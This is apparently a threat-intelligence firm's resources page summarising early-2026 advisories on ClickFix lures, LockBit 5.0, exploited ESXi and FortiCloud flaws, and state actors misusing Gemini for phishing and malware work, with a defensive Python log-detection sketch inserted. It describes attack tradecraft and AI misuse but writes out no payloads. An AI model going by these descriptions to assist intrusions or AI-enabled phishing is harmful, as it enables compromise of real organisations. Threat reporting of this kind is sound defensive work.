Resources

Article
Feb 20, 2026
Threat Actors Leveraging Gemini AI for All Attack Stages
State-backed threat actors are leveraging Google’s Gemini AI as a force multiplier to support all stages of the cyberattack lifecycle, from reconnaissance to post-compromise operations. According to the Google Threat Intelligence Group (GTIG), threat actors linked to the People’s Republic of China (PRC), Iran, North Korea, and other unattributed groups have misused Gemini to accelerate target profiling, synthesize open-source intelligence, identify official email addresses, map organizational structures, generate tailored phishing lures, translate content, conduct vulnerability testing, support coding tasks, and troubleshoot malware development. Cybercriminals are increasingly exploring AI-enabled tools and services to scale malicious activities, including social engineering campaigns such as ClickFix, demonstrating how generative AI is being integrated into both espionage and financially motivated threat operations.
What’s Notable and Unique
Threat actors are leveraging Gemini beyond basic reconnaissance, using it to generate polished, culturally nuanced phishing lures and sustain convincing multi-turn social engineering conversations that minimize traditional red flags.
In addition, threat actors rely on Gemini for vulnerability research, malware debugging, code generation, command-and-control development, and technical troubleshooting, with PRC groups emphasizing automation and vulnerability analysis, Iranian actors focusing on social engineering and malware development, and North Korean actors prioritizing high-fidelity target profiling.
Beyond direct operational support, adversaries have abused public generative AI platforms to host deceptive ClickFix instructions, tricking users into pasting malicious commands that deliver macOS variants of ATOMIC Stealer.
AI is also being integrated directly into malware development workflows, as seen with CoinBait’s AI-assisted phishing kit capabilities and HonestCue’s use of the Gemini API to dynamically generate and execute in-memory C# payloads.
Underground forums show strong demand for AI-powered offensive tools, with offerings like Xanthorox falsely marketed as custom AI but actually built on third-party commercial models integrated through open-source frameworks such as Crush, Hexstrike AI, LibreChat-AI, and Open WebUI, including Gemini.
Analyst Comments
The increasing misuse of generative AI platforms like Gemini highlights a rapidly evolving threat landscape in which state-backed and financially motivated actors leverage AI as a force multiplier for reconnaissance, phishing, malware development, and post-compromise operations. At the same time, large-scale model extraction attempts and API abuse demonstrate emerging risks to AI service integrity, intellectual property, and the broader AI-as-a-Service ecosystem. While these developments underscore the scalability and sophistication of AI-enabled threats, continued enforcement actions, strengthened safeguards, and proactive security testing by providers reflect ongoing efforts to mitigate abuse and adapt defenses in response to increasingly AI-driven adversaries.
Sources
GTIG AI Threat Tracker: Distillation, Experimentation, and (Continued) Integration of AI for Adversarial Use

Article
Feb 12, 2026
2025 VMware ESXi Vulnerability Exploited by Ransomware Groups
Ransomware groups are actively exploiting CVE-2025-22225, a VMware ESXi arbitrary write vulnerability that allows attackers to escape the VMX sandbox and gain kernel-level access to the hypervisor. Although VMware (Broadcom) patched this flaw in March 2025, threat actors had already exploited it in the wild, and CISA recently confirmed that threat actors are exploiting CVE-2025-22225 in active campaigns.
What’s Notable and Unique
Chinese-speaking threat actors abused this vulnerability at least a year before disclosure, via a compromised SonicWall VPN chain.
Threat researchers have observed sophisticated exploit toolkits, possibly developed well before public disclosure, that chain this bug with others to achieve full VM escape. Evidence points to targeted activity, including exploitation via compromised VPN appliances and automated orchestrators.
Attackers with VMX level privileges can trigger a kernel write, break out of the sandbox, and compromise the ESXi host. Intrusions observed in December 2025 showed lateral movement, domain admin abuse, firewall rule manipulation, and staging of data for exfiltration.
CISA has now added CVE-2025-22225 to its Known Exploited Vulnerabilities (KEV) catalog, underscoring ongoing use by ransomware attackers.
Analyst Comments
Compromise of ESXi hypervisors significantly amplifies operational impact, allowing access to and potential encryption of dozens of VMs simultaneously. Organizations running ESXi 7.x and 8.x remain at high risk if patches and mitigations have not been applied. Clients should therefore apply the VMware patches from VMSA-2025-0004 across all ESXi, Workstation, and Fusion deployments. Enterprises are also advised to review their setups to reduce exposure, as protecting publicly accessible management interfaces is a fundamental security best practice.
Sources
CVE-2025-22225 in VMware ESXi now used in active ransomware attacks
The Great VM Escape: ESXi Exploitation in the Wild
VMSA-2025-0004: VMware ESXi, Workstation, and Fusion updates address multiple vulnerabilities (CVE-2025-22224, CVE-2025-22225, CVE-2025-22226)

Article
Feb 5, 2026
Ransomware Trends & Data Insights: January 2026
Although Akira was once again the most active ransomware group in January, the threat landscape was more evenly distributed than it was throughout most of 2025. In December 2025, the three most active threat groups accounted for 57% of all ransomware and extortion activity; in January, the top three accounted for just 34%. Akira’s dominance also decreased to levels more consistent with early 2025, as the group was responsible for almost a third of all attacks in December but just 17% in January.
The number of unique ransomware and extortion groups observed in January increased slightly, to 17, up from 14 in December. It is too early to assess whether this trend will be the new normal for 2026. It is also worth noting that overall activity in January was lower than in previous months, consistent with what Arete typically observes at the beginning of a new year.

Figure 1. Activity from all threat groups in January 2026
Throughout the month of January, analysts at Arete identified several distinct trends behind the threat actors perpetrating cybercrime activities:
In January, Arete observed the reemergence of the LockBit Ransomware-as-a-Service (RaaS) group, which deployed an updated “LockBit 5.0” variant of its ransomware. LockBit first announced the 5.0 version on the RAMP dark web forum in early September 2025, coinciding with the group’s six-year anniversary. The latest LockBit 5.0 variant has both Windows and Linux versions, with notable improvements, including anti-analysis features and unique 16-character extensions added to each encrypted file. However, it remains to be seen whether LockBit will return to consistent activity levels in 2026.
The ClickFix social engineering technique, which leverages fake error dialog boxes to deceive users into manually executing malicious PowerShell commands, continued to evolve in unique ways in January. One campaign reported in January involved fake Blue Screen of Death (BSOD) messages manipulating users into pasting attacker-controlled code. During the month, researchers also documented a separate campaign, dubbed “CrashFix,” that uses a malicious Chrome browser extension-based attack vector. It crashes the web browser, displays a message stating the browser had "stopped abnormally," and then prompts the victim to click a button that executes malicious commands.
Also in January, Fortinet confirmed that a new critical authentication vulnerability affecting its FortiGate devices is being actively exploited. The vulnerability, tracked as CVE-2026-24858, allows attackers with a FortiCloud account to log in to devices registered to other account owners due to an authentication bypass flaw in devices using FortiCloud single sign-on (SSO). This recent activity follows the exploitation of two other Fortinet SSO authentication flaws, CVE-2025-59718 and CVE-2025-59719, which were disclosed in December 2025.
Source
Arete Internal

Article
Feb 2, 2026
New FortiCloud SSO Vulnerability Exploited
Fortinet recently confirmed that its FortiGate devices are affected by a new critical authentication vulnerability that is being actively exploited. The vulnerability, tracked as CVE-2026-24858, allows attackers with a FortiCloud account to log in to devices registered to other account owners due to an authentication bypass flaw in devices using FortiCloud single sign-on (SSO). CISA added the vulnerability to its Known Exploited Vulnerabilities catalogue and gave federal agencies just three days to patch, which requires users to upgrade all devices running FortiOS, FortiManager, FortiAnalyzer, FortiProxy, and FortiWeb to fixed versions. This recent activity follows the exploitation of two other SSO authentication flaws, CVE-2025-59718 and CVE-2025-59719, which were disclosed last month.
What’s Notable and Unique
There are strong indications that much of the recent exploitation activity was automated, with attackers moving from initial access to account creation within seconds.
As observed in December 2025, the attackers’ primary target appears to be firewall configuration files, which contain a trove of information that can be leveraged in future operations.
The threat actors in this campaign favor innocuous, IT-themed email and account names, with malicious login activity originating from cloud-init@mail[.]io and cloud-noc@mail[.]io, while account names such as ‘secadmin’, ‘itadmin’, ‘audit’, and others are created for persistence and subsequent activity.
Analyst Comments
This is an active campaign, and the investigation into these attacks is ongoing. Organizations relying on FortiGate devices should remain extremely vigilant, even after following patching guidance. With threat actors circumventing authentication, it’s crucial to monitor for and alert on anomalous behavior within your environment, such as the unauthorized creation of admin accounts, the creation or modification of access policies, logins outside normal working hours, and anything that deviates from your security baseline.
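One way to operationalize the monitoring the comments above call for, as an added example (not Arete's or Fortinet's code): the log lines are constructed, and the field names, the registered-owner list, the approved-admin list and the business-hours window are assumptions that a deployment would replace with its own values.

```python
"""Detection sketch for the FortiGate SSO-abuse behaviours described above:
SSO logins from FortiCloud accounts that do not own the device, off-hours
logins, unapproved admin-account creation, access-policy changes, and a
login-to-admin-creation sequence fast enough to suggest automation.

Added example. The key=value log format below is a constructed, simplified
stream; the field names and the lists/constants are assumptions.
"""
import shlex
from datetime import datetime, timedelta

# Constructed sample events (not real logs): one SSO login from an account
# that is not the device's registered owner, an admin creation seconds later,
# a policy edit, then a benign owner login during business hours.
SAMPLE_LOG = """\
date=2026-01-28 time=03:14:02 type=event subtype=system action=login status=success method=sso user="cloud-init@mail[.]io" srcip=203.0.113.10 msg="FortiCloud SSO login"
date=2026-01-28 time=03:14:06 type=event subtype=system action=Add user="cloud-init@mail[.]io" cfgpath="system.admin" cfgobj="secadmin" msg="Add system.admin secadmin"
date=2026-01-28 time=03:14:09 type=event subtype=system action=Edit user="cloud-init@mail[.]io" cfgpath="firewall.policy" cfgobj="7" msg="Edit firewall.policy 7"
date=2026-01-28 time=10:02:44 type=event subtype=system action=login status=success method=sso user="ops@example.com" srcip=198.51.100.5 msg="FortiCloud SSO login"
"""

REGISTERED_OWNERS = {"ops@example.com"}     # placeholder: FortiCloud accounts expected on this device
APPROVED_ADMINS = {"admin", "ops"}          # placeholder: admin objects allowed to exist
BUSINESS_HOURS = (8, 18)                    # placeholder: local 08:00-18:00
AUTOMATION_WINDOW = timedelta(seconds=30)   # "initial access to account creation within seconds"


def parse_line(line):
    """Turn one key=value event line into a dict; quoted values are allowed."""
    fields = {}
    for token in shlex.split(line):
        key, _, value = token.partition("=")
        fields[key] = value
    fields["ts"] = datetime.strptime(f"{fields['date']} {fields['time']}", "%Y-%m-%d %H:%M:%S")
    return fields


def analyze(log_text):
    """Return (timestamp, rule, detail) alerts in event order."""
    events = [parse_line(l) for l in log_text.splitlines() if l.strip()]
    alerts = []
    last_sso_login = {}  # user -> timestamp of the most recent successful SSO login
    for ev in events:
        user, ts, action = ev.get("user", ""), ev["ts"], ev.get("action", "")
        if action == "login" and ev.get("method") == "sso" and ev.get("status") == "success":
            last_sso_login[user] = ts
            if user not in REGISTERED_OWNERS:
                alerts.append((ts, "sso_login_unregistered_account", user))
            if not (BUSINESS_HOURS[0] <= ts.hour < BUSINESS_HOURS[1]):
                alerts.append((ts, "login_outside_business_hours", user))
        elif action == "Add" and ev.get("cfgpath") == "system.admin":
            new_admin = ev.get("cfgobj", "")
            if new_admin not in APPROVED_ADMINS:
                alerts.append((ts, "unapproved_admin_created", new_admin))
            login_ts = last_sso_login.get(user)
            if login_ts is not None and ts - login_ts <= AUTOMATION_WINDOW:
                alerts.append((ts, "admin_created_seconds_after_login", f"{user} -> {new_admin}"))
        elif action in ("Add", "Edit", "Delete") and ev.get("cfgpath", "").startswith("firewall.policy"):
            alerts.append((ts, "access_policy_changed", f"{user} {action} {ev.get('cfgobj')}"))
    return alerts


def rule_names(alerts):
    """Just the rule identifiers, in order, for quick review or assertions."""
    return [rule for _, rule, _ in alerts]


if __name__ == "__main__":
    for ts, rule, detail in analyze(SAMPLE_LOG):
        print(f"{ts:%Y-%m-%d %H:%M:%S}  {rule:35s} {detail}")
```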
Sources
Administrative FortiCloud SSO authentication bypass
Multiple Fortinet Products’ FortiCloud SSO Login Authentication Bypass
Arctic Wolf Observes Malicious Configuration Changes On Fortinet FortiGate Devices via SSO Accounts
Arctic Wolf Observes Malicious SSO Logins on FortiGate Devices Following Disclosure of CVE-2025-59718 and CVE-2025-59719

Podcast
Jan 26, 2026
Cyber Campfire: December Threat Trends & Insights
Cyber Campfire delivers data-driven insights from Arete’s Threat Intelligence Team. In this episode, we discuss cyber threat trends, statistics, and emerging threat actors from December 2025. Tune in for an in-depth look at the evolving threat landscape and actionable insights for global organizations and security partners.

Article
Jan 26, 2026
Chrome Extensions Used for Credential-Stealing and ClickFix Attacks
Recent research reveals two distinct but similar malicious Chrome browser extension campaigns that demonstrate how threat actors are increasingly abusing trusted browser extension ecosystems to gain initial access, steal sessions, and compromise enterprise environments.
What’s Notable and Unique
In mid-January 2026, cybersecurity researchers uncovered a coordinated cluster of five malicious Chrome extensions masquerading as enterprise productivity or access management tools for popular Human Resource and Enterprise Resource Planning platforms such as Workday, NetSuite, and SAP SuccessFactors.
Although published under different names, the extensions shared identical infrastructure, code patterns, and attack logic, indicating a single, well-organized operation. These extensions enabled session hijacking and full account takeover by abusing browser-level access.
In January, researchers also documented a separate campaign, dubbed “CrashFix,” which uses a different but equally effective browser extension-based attack vector. In this case, a malicious Chrome extension named NexShield impersonated the legitimate uBlock Origin Lite ad blocker and was distributed through malicious ads that redirected users to the official Chrome Web Store where they would be prompted to download the malicious version.
The technique mentioned above is yet another evolution of the ClickFix-style social engineering that emerged in 2025, in which users are tricked into executing malicious commands themselves. In CrashFix attacks, following the instructions led to the execution of PowerShell commands that downloaded and installed ModeloRAT, a previously undocumented Python-based remote access trojan.
Analyst Comments
Browser extensions are being weaponized as highly trusted initial access vectors, with attackers blending technical abuse (cookie theft, resource exhaustion) with social engineering (productivity branding, fake repair prompts). Together, these two recent findings demonstrate that malicious Chrome extensions pose a risk as a primary entry point for enterprise compromise, making browser extension governance, monitoring, and user education a critical defensive priority. Organizations should monitor for hidden PowerShell processes that are accessing browser cache folders and limit the use of PowerShell to privileged administrators. Organizations should also continue to promote and update their security awareness training, educating employees on newer social engineering techniques such as ClickFix.
Sources
5 Malicious Chrome Extensions Enable Session Hijacking in Enterprise HR and ERP Systems
Dissecting CrashFix: KongTuke’s New Toy

Article
Jan 20, 2026
LockBit 5.0: The RaaS That Refuses to Go Away
The once-prolific LockBit group appears to have reemerged, recently deploying an updated “LockBit 5.0” variant of its ransomware. Although the Ransomware-as-a-Service (RaaS) group has been trying to reestablish its brand since international law enforcement disrupted the group’s infrastructure in early 2024, this latest effort appears to be a return to form.
LockBit first announced the 5.0 version on the RAMP dark web forum in early September 2025, coinciding with the group’s six-year anniversary. In early December 2025, the group posted an announcement on its old data leak site (DLS) with a link to its new Christmas-themed LockBit 5.0 DLS. Since then, the group has already posted over 100 alleged victims to the new DLS.

Figure 1. LockBit’s new “5.0” DLS (Source: Arete)
A Long History of LockBit Variants
According to researchers, the 5.0 variant has numerous code overlaps with the LockBit 4.0 variant and appears to be the latest in a series of evolving ransomware versions observed since the group first emerged in September 2019.
In June 2021, LockBit released version 2.0, also known as LockBit Red, followed by a Linux version released in October 2021 that could be deployed on Linux and VMware ESXi systems.
In March 2022, the group released version 3.0, which was also known as LockBit Black. The builder for this LockBit 3.0 variant was subsequently leaked by a disgruntled affiliate in June 2023. Since then, this leaked builder has been used by a number of unaffiliated threat actors, even after law enforcement’s disruption of the LockBit RaaS in 2024.
Following the leak of the LockBit Black builder, the group released a LockBit Green version in January 2023, followed by a macOS version in April 2023.
In February 2024, international law enforcement disrupted LockBit’s operations, seizing the group’s DLS along with numerous websites and servers used by LockBit administrators. In May 2024, international law enforcement revealed that Russian national Dmitry Yuryevich Khoroshev, who went by the alias LockBitSupp, was the developer and administrator of the LockBit RaaS. Khoroshev was sanctioned by the US Department of the Treasury’s Office of Foreign Assets Control (OFAC), the UK’s Foreign Commonwealth & Development Office (FCDO), and the Australian Department of Foreign Affairs.
In December 2024, LockBit announced the release of LockBit 4.0, with the new version becoming available to affiliates in February 2025. However, the group remained quiet for most of 2025, and Arete never observed any incidents involving the 4.0 version during the year.
The latest LockBit 5.0 variant has both Windows and Linux versions, with notable improvements, including anti-analysis features and unique 16-character extensions added to each encrypted file. Ransom notes for the 5.0 version direct victims to Tor chat panels, similar to those the group used before law enforcement’s disruptions.
Analyst Comments
Despite the number of victims initially posted to the new DLS, it remains to be seen whether LockBit will return to consistent activity levels in 2026. With the group continuing to operate under the LockBit brand, the sanctions against Khoroshev should inhibit victims contemplating payment for LockBit 5.0 decryption keys, creating a substantial barrier to the group reclaiming its place as one of the top RaaS organizations. If the group becomes an increasingly active threat in 2026, the OFAC sanction implications make it exceedingly important for organizations to have adequate data protection and security practices in place to be able to recover from potential encryption and extortion attacks without payment.

Article
Jan 20, 2026
Click-Fix Attacks Now Using Fake Blue Screen of Death
The ClickFix social engineering technique has gained significant popularity across the threat landscape since it emerged in 2025. It leverages fake error dialog boxes to deceive users into manually executing malicious PowerShell commands. This technique is commonly delivered through compromised websites, malicious documents, HTML attachments, or phishing URLs, and has been associated with a wide range of malware families, including AsyncRAT, DarkGate, NetSupport, and Lumma Stealer.
More recently, threat researchers have identified a clever evolution of this technique targeting the hospitality sector. This campaign combines ClickFix lures with fake CAPTCHA prompts and counterfeit Blue Screen of Death (BSOD) messages to manipulate users into pasting attacker-controlled code. This approach enables defense evasion and ultimately results in the deployment of the Russian-linked DCRat malware.

Figure 1. Example of a fake BSOD used to trick victims (Source: Securonix)
What’s Notable and Unique
This latest campaign leverages phishing emails impersonating Booking.com, using Euro-denominated reservation cancellation charges to create urgency and direct victims to fraudulent websites.
These websites use fake CAPTCHA challenges and counterfeit BSOD messages as social engineering lures, targeting hospitality organizations, particularly European entities, during the peak holiday season.
This social engineering technique ultimately deceives users into executing malicious code that abuses MSBuild.exe to deploy a Russian-linked DCRat payload, enabling persistent remote access, process hollowing, keylogging, and secondary payload delivery.
Analyst Comments
ClickFix social engineering techniques continue to evolve, with earlier-identified variants like FileFix using sophisticated methods that trick users into copying malicious scripts, which are then executed through Windows File Explorer. The latest campaign now employs fake BSOD prompts to deceive victims and deploy DCRat malware, underscoring the importance of vigilance against emerging social engineering threats. To defend against these attacks, organizations should provide ongoing employee training to recognize and respond to social engineering techniques, ensure software is downloaded only from trusted sources, and restrict PowerShell usage to privileged administrators.
Sources
Analyzing PHALT#BLYX: How Fake BSODs and Trusted Build Tools Are Used to Construct a Malware Infection
Think before you Click(Fix): Analyzing the ClickFix social engineering technique

Article
Jan 12, 2026
Ransomware Trends & Data Insights: December 2025
Consistent with the second half of 2025, Akira continues to dominate the ransomware landscape. In December, the group was responsible for over a third of all ransomware and extortion engagements observed by Arete. Akira was also responsible for 10% more ransomware attacks than the second and third most active groups, Qilin and INC Ransom, combined. Collectively, the top three most active threat groups in December comprised about 57% of all activity Arete observed during the month.

Figure 1. Activity from the top 3 threat groups in December 2025
Throughout the month of December, analysts at Arete identified several distinct trends behind the threat actors perpetrating cybercrime activities:
In addition to Akira, Qilin, and INC, there has recently been an uptick in engagements attributed to RansomHouse, a group that Arete had not observed since early 2024. Reporting from December 2025 indicated that the group updated its encryption code to make it more efficient, which could partly explain the increase in RansomHouse engagements observed in November and December.
In early December, a maximum-severity flaw was reported in the widely used JavaScript library React that allows unauthenticated remote attackers to execute malicious code on vulnerable instances. The vulnerability, tracked as CVE-2025-55182, also known as React2Shell, was assigned a maximum CVSS severity rating of 10.0, with an estimated 39% of cloud environments affected at the time the vulnerability was disclosed. Organizations should prioritize immediate patching to address the React2Shell (CVE-2025-55182) vulnerability and ensure all internet-facing applications are updated to the vendor-recommended versions.
In late December 2025, a high-severity, pre-authentication memory vulnerability was disclosed that affects MongoDB versions 3.6 and later. Referred to as MongoBleed (CVE-2025-14847), the vulnerability enables unauthenticated attackers to send malformed network messages, thereby leaking uninitialized server memory that contains sensitive data, such as credentials, tokens, and API keys. While the flaw does not allow for remote code execution and no ransomware campaigns have been confirmed, researchers have linked it to real-world abuse, including a suspected Ubisoft Rainbow Six Siege backend compromise. Data leaked from these incidents could enable follow-on attacks, including ransomware. Organizations with publicly exposed MongoDB servers affected by the vulnerability should immediately patch to the latest version.
Sources
Arete Internal

Sources
Administrative FortiCloud SSO authentication bypass
Multiple Fortinet Products’ FortiCloud SSO Login Authentication Bypass
Arctic Wolf Observes Malicious Configuration Changes On Fortinet FortiGate Devices via SSO Accounts
Arctic Wolf Observes Malicious SSO Logins on FortiGate Devices Following Disclosure of CVE-2025-59718 and CVE-2025-59719
Read More

Podcast
Jan 26, 2026
Cyber Campfire: December Threat Trends & Insights
Cyber Campfire delivers data-driven insights from Arete’s Threat Intelligence Team. In this episode, we discuss cyber threat trends, statistics, and emerging threat actors from December 2025. Tune in for an in-depth look at the evolving threat landscape and actionable insights for global organizations and security partners.
Read More

Article
Jan 26, 2026
Chrome Extensions Used for Credential-Stealing and ClickFix Attacks
Recent research reveals two distinct but similar malicious Chrome browser extension campaigns that demonstrate how threat actors are increasingly abusing trusted browser extension ecosystems to gain initial access, steal sessions, and compromise enterprise environments.
What’s Notable and Unique
In mid-January 2026, cybersecurity researchers uncovered a coordinated cluster of five malicious Chrome extensions masquerading as enterprise productivity or access management tools for popular Human Resource and Enterprise Resource Planning platforms such as Workday, NetSuite, and SAP SuccessFactors.
Although published under different names, the extensions shared identical infrastructure, code patterns, and attack logic, indicating a single, well-organized operation. These extensions enabled session hijacking and full account takeover by abusing browser-level access.
In January, researchers also documented a separate campaign, dubbed “CrashFix,” which uses a different but equally effective browser extension-based attack vector. In this case, a malicious Chrome extension named NexShield impersonated the legitimate uBlock Origin Lite ad blocker and was distributed through malicious ads that redirected users to the official Chrome Web Store where they would be prompted to download the malicious version.
The technique mentioned above is yet another evolution of the ClickFix-style social engineering that emerged in 2025, in which users are tricked into executing malicious commands themselves. In CrashFix attacks, following the instructions led to the execution of PowerShell commands that downloaded and installed ModeloRAT, a previously undocumented Python-based remote access trojan.
Analyst Comments
Browser extensions are being weaponized as highly trusted initial access vectors, with attackers blending technical abuse (cookie theft, resource exhaustion) with social engineering (productivity branding, fake repair prompts). Together, these two recent findings demonstrate that malicious Chrome extensions pose a risk as a primary entry point for enterprise compromise, making browser extension governance, monitoring, and user education a critical defensive priority. Organizations should monitor for hidden PowerShell processes that are accessing browser cache folders and limit the use of PowerShell to privileged administrators. Organizations should also continue to promote and update their security awareness training, educating employees on newer social engineering techniques such as ClickFix.
Sources
5 Malicious Chrome Extensions Enable Session Hijacking in Enterprise HR and ERP Systems
Dissecting CrashFix: KongTuke’s New Toy
Read More

Article
Jan 20, 2026
LockBit 5.0: The RaaS That Refuses to Go Away
The once-prolific LockBit group appears to have reemerged, recently deploying an updated “LockBit 5.0” variant of its ransomware. Although the Ransomware-as-a-Service (RaaS) group has been trying to reestablish its brand since international law enforcement disrupted the group’s infrastructure in early 2024, this latest effort appears to be a return to form.
LockBit first announced the 5.0 version on the RAMP dark web forum in early September 2025, coinciding with the group’s six-year anniversary. In early December 2025, the group posted an announcement on its old data leak site (DLS) with a link to its new Christmas-themed LockBit 5.0 DLS. Since then, the group has already posted over 100 alleged victims to the new DLS.

Figure 1. LockBit’s new “5.0” DLS (Source: Arete)
A Long History of LockBit Variants
According to researchers, the 5.0 variant has numerous code overlaps with the LockBit 4.0 variant and appears to be the latest in a series of evolving ransomware versions observed since the group first emerged in September 2019.
In June 2021, LockBit released version 2.0, also known as LockBit Red, followed by a Linux version released in October 2021 that could be deployed on Linux and VMware ESXi systems.
In March 2022, the group released version 3.0, which was also known as LockBit Black. The builder for this LockBit 3.0 variant was subsequently leaked by a disgruntled affiliate in June 2023. Since then, this leaked builder has been used by a number of unaffiliated threat actors, even after law enforcement’s disruption of the LockBit RaaS in 2024.
Following the leak of the LockBit Black builder, the group released a LockBit Green version in January 2023, followed by a macOS version in April 2023.
In February 2024, international law enforcement disrupted LockBit’s operations, seizing the group’s DLS along with numerous websites and servers used by LockBit administrators. In May 2024, international law enforcement revealed that Russian national Dmitry Yuryevich Khoroshev, who went by the alias LockBitSupp, was the developer and administrator of the LockBit RaaS. Khoroshev was sanctioned by the US Department of the Treasury’s Office of Foreign Assets Control (OFAC), the UK’s Foreign Commonwealth & Development Office (FCDO), and the Australian Department of Foreign Affairs.
In December 2024, LockBit announced the release of LockBit 4.0, with the new version becoming available to affiliates in February 2025. However, the group remained quiet for most of 2025, and Arete never observed any incidents involving the 4.0 version during the year.
The latest LockBit 5.0 variant has both Windows and Linux versions, with notable improvements, including anti-analysis features and unique 16-character extensions added to each encrypted file. Ransom notes for the 5.0 version direct victims to Tor chat panels, similar to those the group used before law enforcement’s disruptions.
Analyst Comments
Despite the number of victims initially posted to the new DLS, it remains to be seen whether LockBit will return to consistent activity levels in 2026. With the group continuing to operate under the LockBit brand, the sanctions against Khoroshev should inhibit victims contemplating payment for LockBit 5.0 decryption keys, creating a substantial barrier to the group reclaiming its place as one of the top RaaS organizations. If the group becomes an increasingly active threat in 2026, the OFAC sanction implications make it exceedingly important for organizations to have adequate data protection and security practices in place to be able to recover from potential encryption and extortion attacks without payment.
Read More

Article
Jan 20, 2026
Click-Fix Attacks Now Using Fake Blue Screen of Death
The ClickFix social engineering technique has gained significant popularity across the threat landscape since it emerged in 2025. It leverages fake error dialog boxes to deceive users into manually executing malicious PowerShell commands. This technique is commonly delivered through compromised websites, malicious documents, HTML attachments, or phishing URLs, and has been associated with a wide range of malware families, including AsyncRAT, DarkGate, NetSupport, and Lumma Stealer.
More recently, threat researchers have identified a clever evolution of this technique targeting the hospitality sector. This campaign combines ClickFix lures with fake CAPTCHA prompts and counterfeit Blue Screen of Death (BSOD) messages to manipulate users into pasting attacker-controlled code. This approach enables defense evasion and ultimately results in the deployment of the Russian-linked DCRat malware.

Figure 1. Example of a fake BSOD used to trick victims (Source: Securonix)
What’s Notable and Unique
This latest campaign leverages phishing emails impersonating Booking.com, using Euro-denominated reservation cancellation charges to create urgency and direct victims to fraudulent websites.
These websites use fake CAPTCHA challenges and counterfeit BSOD messages as social engineering lures, targeting hospitality organizations, particularly European entities, during the peak holiday season.
This social engineering technique ultimately deceives users into executing malicious code that abuses MSBuild.exe to deploy a Russian-linked DCRat payload, enabling persistent remote access, process hollowing, keylogging, and secondary payload delivery.
Analyst Comments
ClickFix social engineering techniques continue to evolve, with earlier-identified variants like FileFix using sophisticated methods that trick users into copying malicious scripts, which are then executed through Windows File Explorer. The latest campaign now employs fake BSOD prompts to deceive victims and deploy DCRat malware, underscoring the importance of vigilance against emerging social engineering threats. To defend against these attacks, organizations should provide ongoing employee training to recognize and respond to social engineering techniques, ensure software is downloaded only from trusted sources, and restrict PowerShell usage to privileged administrators.
Sources
Analyzing PHALT#BLYX: How Fake BSODs and Trusted Build Tools Are Used to Construct a Malware Infection
Think before you Click(Fix): Analyzing the ClickFix social engineering technique
Read More

Article
Jan 12, 2026
Ransomware Trends & Data Insights: December 2025
Consistent with the second half of 2025, Akira continues to dominate the ransomware landscape. In December, the group was responsible for over a third of all ransomware and extortion engagements observed by Arete. Akira was also responsible for 10% more ransomware attacks than the second- and third-most active groups, Qilin and INC Ransom, combined. Collectively, the top three most active threat groups in December comprised about 57% of all activity Arete observed during the month.

Figure 1. Activity from the top 3 threat groups in December 2025
Throughout the month of December, analysts at Arete identified several distinct trends behind the threat actors perpetrating cybercrime activities:
In addition to Akira, Qilin, and INC, there has recently been an uptick in engagements attributed to RansomHouse, a group that Arete had not observed since early 2024. Reporting from December 2025 indicated that the group updated its encryption code to make it more efficient, which could partly explain the increase in RansomHouse engagements observed in November and December.
In early December, a maximum-severity flaw was reported in the widely used JavaScript library React that allows unauthenticated remote attackers to execute malicious code on vulnerable instances. The vulnerability, tracked as CVE-2025-55182, also known as React2Shell, was assigned a maximum CVSS severity rating of 10.0, with an estimated 39% of cloud environments affected at the time the vulnerability was disclosed. Organizations should prioritize immediate patching to address the React2Shell (CVE-2025-55182) vulnerability and ensure all internet-facing applications are updated to the vendor-recommended versions.
In late December 2025, a high-severity, pre-authentication memory vulnerability was disclosed that affects MongoDB versions 3.6 and later. Referred to as MongoBleed (CVE-2025-14847), the vulnerability enables unauthenticated attackers to send malformed network messages, thereby leaking uninitialized server memory that contains sensitive data, such as credentials, tokens, and API keys. While the flaw does not allow for remote code execution and no ransomware campaigns have been confirmed, researchers have linked it to real-world abuse, including a suspected Ubisoft Rainbow Six Siege backend compromise. Data leaked from these incidents could enable follow-on attacks, including ransomware. Organizations with publicly exposed MongoDB servers affected by the vulnerability should immediately patch to the latest version.
Sources
Arete Internal
Read More

Article
Feb 20, 2026
Threat Actors Leveraging Gemini AI for All Attack Stages
State-backed threat actors are leveraging Google’s Gemini AI as a force multiplier to support all stages of the cyberattack lifecycle, from reconnaissance to post-compromise operations. According to the Google Threat Intelligence Group (GTIG), threat actors linked to the People’s Republic of China (PRC), Iran, North Korea, and other unattributed groups have misused Gemini to accelerate target profiling, synthesize open-source intelligence, identify official email addresses, map organizational structures, generate tailored phishing lures, translate content, conduct vulnerability testing, support coding tasks, and troubleshoot malware development. Cybercriminals are increasingly exploring AI-enabled tools and services to scale malicious activities, including social engineering campaigns such as ClickFix, demonstrating how generative AI is being integrated into both espionage and financially motivated threat operations.
What’s Notable and Unique
Threat actors are leveraging Gemini beyond basic reconnaissance, using it to generate polished, culturally nuanced phishing lures and sustain convincing multi-turn social engineering conversations that minimize traditional red flags.
In addition, threat actors rely on Gemini for vulnerability research, malware debugging, code generation, command-and-control development, and technical troubleshooting, with PRC groups emphasizing automation and vulnerability analysis, Iranian actors focusing on social engineering and malware development, and North Korean actors prioritizing high-fidelity target profiling.
Beyond direct operational support, adversaries have abused public generative AI platforms to host deceptive ClickFix instructions, tricking users into pasting malicious commands that deliver macOS variants of ATOMIC Stealer.
AI is also being integrated directly into malware development workflows, as seen with CoinBait’s AI-assisted phishing kit capabilities and HonestCue’s use of the Gemini API to dynamically generate and execute in-memory C# payloads.
Underground forums show strong demand for AI-powered offensive tools, with offerings like Xanthorox falsely marketed as custom AI but actually built on third-party commercial models, including Gemini, integrated through open-source frameworks such as Crush, Hexstrike AI, LibreChat-AI, and Open WebUI.
Analyst Comments
The increasing misuse of generative AI platforms like Gemini highlights a rapidly evolving threat landscape in which state-backed and financially motivated actors leverage AI as a force multiplier for reconnaissance, phishing, malware development, and post-compromise operations. At the same time, large-scale model extraction attempts and API abuse demonstrate emerging risks to AI service integrity, intellectual property, and the broader AI-as-a-Service ecosystem. While these developments underscore the scalability and sophistication of AI-enabled threats, continued enforcement actions, strengthened safeguards, and proactive security testing by providers reflect ongoing efforts to mitigate abuse and adapt defenses in response to increasingly AI-driven adversaries.
Sources
GTIG AI Threat Tracker: Distillation, Experimentation, and (Continued) Integration of AI for Adversarial Use
Read More

Article
Feb 12, 2026
2025 VMware ESXi Vulnerability Exploited by Ransomware Groups
